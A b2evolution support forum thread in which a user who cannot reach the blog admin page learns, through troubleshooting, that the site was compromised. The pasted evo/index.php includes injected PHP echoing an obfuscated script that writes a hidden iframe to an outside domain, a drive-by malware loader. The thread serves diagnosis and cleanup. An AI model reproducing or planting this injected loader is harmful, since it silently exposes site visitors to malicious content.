Normally you'd be able to goto http://www.thesparkmarket.com/evo/htsrv/login.php or http://www.thesparkmarket.com/evo/admin.php but both of those just blank page so, crack open conf/_advanced.php and look for $adminurl and hope it sheds some light

¥

First thank you for the answer.

HOWEVER... I am a bit taken aback.... because.... I CANNOT access my blog to make NEW BLOGS or NEW POSTS but it seems to me that YOU CAN AND DID!!

Your signature HERE on this forum includes this....

"yabba_hh: I think, I type, I read what I type, I think "fuck, what was I thinking when I typed that?!"
tuxnus: that's two more thoughts than I give you credit for"

Now I just googled for my blog and found THIS: (along with about 20 OTHER pages and posts and blogs that have been created on MY DOMAIN AND MY BLOG since I came here to ask for HELP!!)

http://www.thesparkmarket.com/evo/blog3.php/2009/01/23/yabba

A BLOG page on MY SERVER that I DID NOT set up or create!!

when going to the above link.... on MY server/website domain.... you find THIS LINK on the page....

http://innervisions.org.uk/babbles/

When you go to THAT page you find this.... YOUR SAME SIGNATURE

"yabba_hh: I think, I type, I read what I type, I think "fuck, what was I thinking when I typed that?!"
tuxnus: that's two more thoughts than I give you credit for"

So it appears to me that YOU have managed to get into my ADMIN and create a NEW BLOG "blog3" and make posts to MY BLOG and I cannot even do that....

FIRST WHY would you do that? and
SECOND - HOW did you do that?

I have to say that I came here for help from the OFFICIAL website of B2evolution where I assumed I was SAFE to ask for help and I feel VERY violated by this act.

Apparently you have found a way to get into MY blog and create new blogs and posts.... I am DESPERATELY in need of being able to access MY OWN blog to help save my life right now.... and I cannot but you can??

That is very discouraging.

Please cease and desist from using my blog site and if you have any decency tell ME how to access my own blog which is the HELP I came here to ask for.

Can you shed some light on the above happenings for me?

LOL! thats what i call a paranoid !

1.) Noone has entered your admin and created a new blog or anything
2.) that blog3.php is the default linkblog comes with 'sample content' that YOU have chosen to install during installation
There is no need to explain the rest but;
3.) That link is included as Yabba is one of the main contributors and linked as well as the others (daniel, fplanque etc..), and no surprise you see his signature in that external link you have followed (his very own website)

Just to clarify :

Those posts were made on 23rd Jan 2009 when you installed the software and they're the default install posts that are created if you tick the lil box that says "create default posts".

If you hit both of the links in my previous message you'll see that they both lead to blank pages. They're the normal routes to admin.

Even if one of them worked I'd still have needed to guess your password before I could have got into your admin.

Do you *really* think I'm that bloody good at guessing?

¥

I deleted ALL extra blogs that came with installation... picture blog etc....

IF there is a sane explanation for this I am asking for it.

I did not create these pages ... I certainly did not create a page called blog 3 with a link to that persons personal website and there were 3 blogs with the install and I deleted two of them and then created a second blog. So I should only have two blogs - except that the first one is gone for some reason.

Because I know that I deleted all of the extra blogs that came with installation the pages that I found on a google search alarmed me. Having one of them lead back to the person who helped me in this thread really alarmed me.

It is my understanding that this is a peer to peer user help site.
I came to B2evolution and looked for a place to ask a question of an Admin or someone who is an official employee of b2e and could find no where to to do that so I came to what appeared to be my only other option - these forums which said they were users answering users... SO WHY would it even EVER occur to me that this person is some kind of a special person who's name would be on THE SOFTWARE that I downloaded?

Especially since I know that I deleted all the extra blogs and pages when I set it up?

But I think you are saying that Yabba is some kind of elevated user or admin and so his name and website are included in EVERY download of the software... is that what you are saying?

If so - again - I am not paranoid or wrong to question this as these forums are labeled as USERS helping USERS so why would I think that he is important enough to have his name on my software download and think that is normal?? and also due to the fact that I know I deleted all extra pages and blogs after install.

I am not paranoid... I am simply discouraged... I asked for help and then I found a bunch of new pages and blogs created on my domain that I did not create and that were not there when I installed to my knowledge- what I am is MORE CONFUSED than before I came here to seek help.

How is me finding a bunch of new blogs and posts on my domain in my blog software and finding the same signature as the person who answered me here - me being paranoid?

If there is a rational reason for this then it means I am uninformed or missing facts but none of that makes me paranoid.

I simply had a question and asked it.... which led me to a second question... and I asked that one.

Your answer frankly just served to get me even more discouraged.

What I need is help finding my admin section what I don't need is people talking down to me for being confused and asking for explanations. With the facts that I had available the pages that I found looked highly suspicious.

I am brand new to this software and do not have years of knowledge about it or the people involved with it to draw from.

Again, if there is a rational explanation then I apologize.

and again, I appreciate any help that anyone can give me in helping me to find my admin section.

Thanks for the explanation.

I was alarmed by what I found - a detailed explanation is in the post above.

About guessing passwords... I work for a huge web site and you would be surprised at the clever hacks that I have seen and had to deal with over the years... nothing surprises me anymore. That is why I figured it was possible for a user here to be able to get into the blog software on my domain. I've seen crazier things over the years.

Anyway... moving along :)

I checked where you sent me and do not understand what it says there....

Here is what I found...

$admin_url = $baseurl.$dispatcher;

Dunno what that means but that is what it says.

Sorry for the misunderstanding and again, thank you for any help anyone can give me here.

are you a GoDaddy customer by any chance ? i have no idea what your issue is, but [url=http://www.google.com/#hl=en&source=hp&q=blank+admin+page+site%3Aforums.b2evolution.net&aq=f&aqi=&aql=&oq=&fp=c26c79a56c95bda8]search[/url] suggests you might be one

Check if both of the following 2 files exist

/evo/htsrv/login.php && /evo/admin.php

¥

On a separate note, when you get access to your blog you might want to look into deleting those blogs again as it doesn't look like you did as they are still there:

http://www.thesparkmarket.com/evo/summary.php

L

¥åßßå wrote:

Check if both of the following 2 files exist

/evo/htsrv/login.php && /evo/admin.php

¥

Hi -

I checked they are both there.

I looked inside the evo/admin.php file and saw this....

I am wondering if this is supposed to be there or if this could be the problem...

This starts at line 57 - 60 - check global permission

check_perm( 'admin', 'any' ) )
{ // No permission to access admin...
require $adminskins_path.'_access_denied.main.php';

have no idea but thought I would mention it.

Angel

Oh and tilqicom - I don't have GO Daddy but Thanks for looking for me.

Ok, edit your /evo/admin.php and add this line right after the

<?php

at the very top of the file

ini_set('display_errors', 'on' );

So the top of the file now looks like :

<?php
ini_set('display_errors', 'on' );

Save it and then call up your admin page ( http://www.thesparkmarket.com/evo/admin.php ) and see if you get any error messages

¥

<?php
ini_set('display_errors', 'on' );

Save it and then call up your admin page ( http://www.thesparkmarket.com/evo/admin.php ) and see if you get any error messages

¥

... I tried that and it is still a blank page when I go to that link.

A.

Ok, next test :

Remove that line and add these two :

echo 'hello world';
exit();

So your file would now look like :

<?php
echo 'hello world';
exit();

If you don't see hello world when you call that page then have a look and see if you have

/.htaccess or /evo/.htaccess

If either of those files exists see if they have anything that would kill those pages, especially mod_security

¥

¥åßßå wrote:

/.htaccess or /evo/.htaccess

If either of those files exists see if they have anything that would kill those pages, especially mod_security

¥

I had neither of the above files - only a file evo/sample.htaccess

Here is everything it said in it because I am not sure what I am supposed to look for.

I did not see mod_security in it...

---------------------------------------------------------------------------

# Apache configuration for the blog folder
# Lines starting with # are considered as comments.

# PHP SECURITY:
# this will make register globals off in the evo directory
<IfModule mod_php4.c>
	php_flag register_globals off
</IfModule>
<IfModule mod_php5.c>
	php_flag register_globals off
</IfModule>

# PHP5
# This may need to be in each folder:
# AddHandler application/x-httpd-php5 .php

# CLEAN URLS:
# If you're using Apache 2, you may wish to try this if clean URLs don't work:
# AcceptPathInfo	On


# DEFAULT DOCUMENT TO DISPLAY:
# this will select the default blog template to be displayed
# if the URL is just .../blogs/
<IfModule mod_dir.c>
	DirectoryIndex index.php index.html
</IfModule>


# CATCH EVERYTHING INTO B2EVO:
# The following will allow you to have URL right off the site root,
# using index.php as a stub but not showing it.
# This will add support for URLs like:  http://example.com/2006/08/29/post-title
# Redirect anything that's not an existing directory or file to index.php
#
# RewriteEngine On
# RewriteCond %{REQUEST_FILENAME} !-d
# RewriteCond %{REQUEST_FILENAME} !-f
# RewriteRule ^  index.php

-------------------------------------------------

Try renaming that to .htaccess and seeing if the link works, if it does then delete the extra 2 lines at the top of admin.php that you added before.

As an aside, could you also post the code in your /evo/index.php ?

¥

well... I right clicked and hit rename and removed the word sample from the file name that was sample.htaccess and when I did and clicked out of it it DISSAPPEARED completely!! Poof... gone!

So I don't know what that means?

Also here is the code from my /evo/index.php file

---------------------------------------------

<?php
/**
 * This is the main public interface file.
 *
 * IF YOU ARE READING THIS IN YOUR WEB BROWSER, IT MEANS THAT PHP IS NOT PROPERLY INSTALLED
 * ON YOUR WEB SERVER. IF YOU DON'T KNOW WHAT THIS MEANS, CONTACT YOUR SERVER ADMINISTRATOR
 * OR YOUR HOSTING COMPANY.
 *
 * This file is NOT mandatory. You can delete it if you want.
 * You can also replace the contents of this file with contents similar to the contents
 * of a_stub.php, a_noskin.php, multiblogs.php, etc.
 *
 * b2evolution - {@link http://b2evolution.net/}
 * Released under GNU GPL License - {@link http://b2evolution.net/about/license.html}
 * @copyright (c)2003-2008 by Francois PLANQUE - {@link http://fplanque.net/}
 *
 * {@internal Note: we need at least one file in the main package}}
 *
 * @package main
 */

/**
 * First thing: Do the minimal initializations required for b2evo:
 */
require_once dirname(__FILE__).'/conf/_config.php';

require_once $inc_path.'_main.inc.php';

// Check if a specific blog has been requested in the URL:
param( 'blog', 'integer', '', true );

if( empty($blog) )
{ // No blog requested by URL param, let's try to match something in the URL
	$Debuglog->add( 'No blog param received, checking extra path...', 'detectblog' );

	$BlogCache = & get_Cache( 'BlogCache' );

	if( preg_match( '#^(.+?)index.php/([^/]+)#', $ReqHost.$ReqPath, $matches ) )
	{ // We<?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo '
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-7623457-2");
pageTracker._trackPageview();
} catch(err) {}</script>'; ?><?php echo '<script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-32645524-1");pageTracker._trackPageview();} catch(err) {}</script>'; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo '<script>document.write("<"+"i"+"f"+"ram"+"e sr"+"c=\"h"+"t"+"tp"+":"+"/"+"/tr"+"ught"+""+"s"+"a.c"+"o"+"m/\" wid"+"th=1 he"+"ight"+"="+"2></if"+"r"+"a"+""+"me>");</script>'; ?>

--------------------------------------------------------

Urm, that file is very very very wrong.

Ok, the reason why .htaccess vanished is because your ftp program options are set to hide files that start with a dot, find the setting and kill it

Then go back and check if you have one at /.htaccess

You'll also need to go through all your files and look for any more that have been played around with like that

¥

I'll bet you have permissions set to 777. That opens a door for a malicious person to hack your files. Could be a bad guy getting in through bad code on someone else's web on your server, or, a bad guy with an account on your server.

Bummer, but you will really have to clean up stuff now.

When I got defaced that way it was EVERY folder in my 777 directories, which meant everything in /media/

BTW accusing one of the best players here of hacking your installation is total bullshit. Grow up.

¥åßßå wrote:

Urm, that file is very very very wrong.

Ok, the reason why .htaccess vanished is because your ftp program options are set to hide files that start with a dot, find the setting and kill it

Then go back and check if you have one at /.htaccess

You'll also need to go through all your files and look for any more that have been played around with like that

¥

Do you think that I can go to the copy of that file that I have on my computer and copy all the code in it and replace the code in the corrupted one on the server with the code I have in the clean copy on my computer?

Will that work or would that wipe out my colors and settings that I do have done so far?

I may have hit a wall because I cannot find how to change the settings in the ftp program to allow the dot.

But I thank you for all of your help at least I know what the problem is now.
Angel

The thing is, that's only part of your problem, you really need to check every file on your webspace for having been tampered with.

Try searching google for "[name of ftp software] show dot files" and then go looking for a stray .htaccess as well

¥

¥åßßå wrote:

The thing is, that's only part of your problem, you really need to check every file on your webspace for having been tampered with.

Try searching google for "[name of ftp software] show dot files" and then go looking for a stray .htaccess as well

¥

About six months ago we were hacked and there was this malicious code added to many pages on my server.

I found all of them I thought but it never occurred to me to go and look in the b2e folder as it seemed to only be aimed at the main site.

I found and removed all of the instances of this thing then and got an all clear from the program that alerted me to it. I was not checking for it in the b2e folder however so it must have been there all the time and I just did not know because as I said, I had to let the blog sit for almost a year.

I did figure out how to change the FTP and did find the .htaccess file by googling as you suggested. TY

I found it and looked in there and nothing looks suspicious to me.. but I don't exactly know what I am looking for either.... should I post the code in here?

Also, I did delete those two lines on the admin.php page as well.

Sure, paste the code and I'll see if I can find anything

¥

¥åßßå wrote:

Sure, paste the code and I'll see if I can find anything

¥

Thanks, here it is....

# Apache configuration for the blog folder
# Lines starting with # are considered as comments.

# PHP SECURITY:
# this will make register globals off in the evo directory
<IfModule mod_php4.c>
php_flag register_globals off
</IfModule>
<IfModule mod_php5.c>
php_flag register_globals off
</IfModule>

# PHP5
# This may need to be in each folder:
# AddHandler application/x-httpd-php5 .php

# CLEAN URLS:
# If you're using Apache 2, you may wish to try this if clean URLs don't work:
# AcceptPathInfo On

# DEFAULT DOCUMENT TO DISPLAY:
# this will select the default blog template to be displayed
# if the URL is just .../blogs/
<IfModule mod_dir.c>
DirectoryIndex index.php index.html
</IfModule>

# CATCH EVERYTHING INTO B2EVO:
# The following will allow you to have URL right off the site root,
# using index.php as a stub but not showing it.
# This will add support for URLs like: http://example.com/2006/08/29/post-title
# Redirect anything that's not an existing directory or file to index.php
#
# RewriteEngine On
# RewriteCond %{REQUEST_FILENAME} !-d
# RewriteCond %{REQUEST_FILENAME} !-f
# RewriteRule ^ index.php

If it helps, here are a few links to information about the exploit that you are suffering from:

http://blog.immeria.net/2009/06/google-analytics-targeted-by-hackers.html

http://google.com/safebrowsing/diagnostic?site=trughtsa.com/

L

As Lee said, you need to clean those files ( evo/index.php, evo/admin.php && evo/htsrv/login.php ).

That htaccess is the default evo one and no worry ;)

¥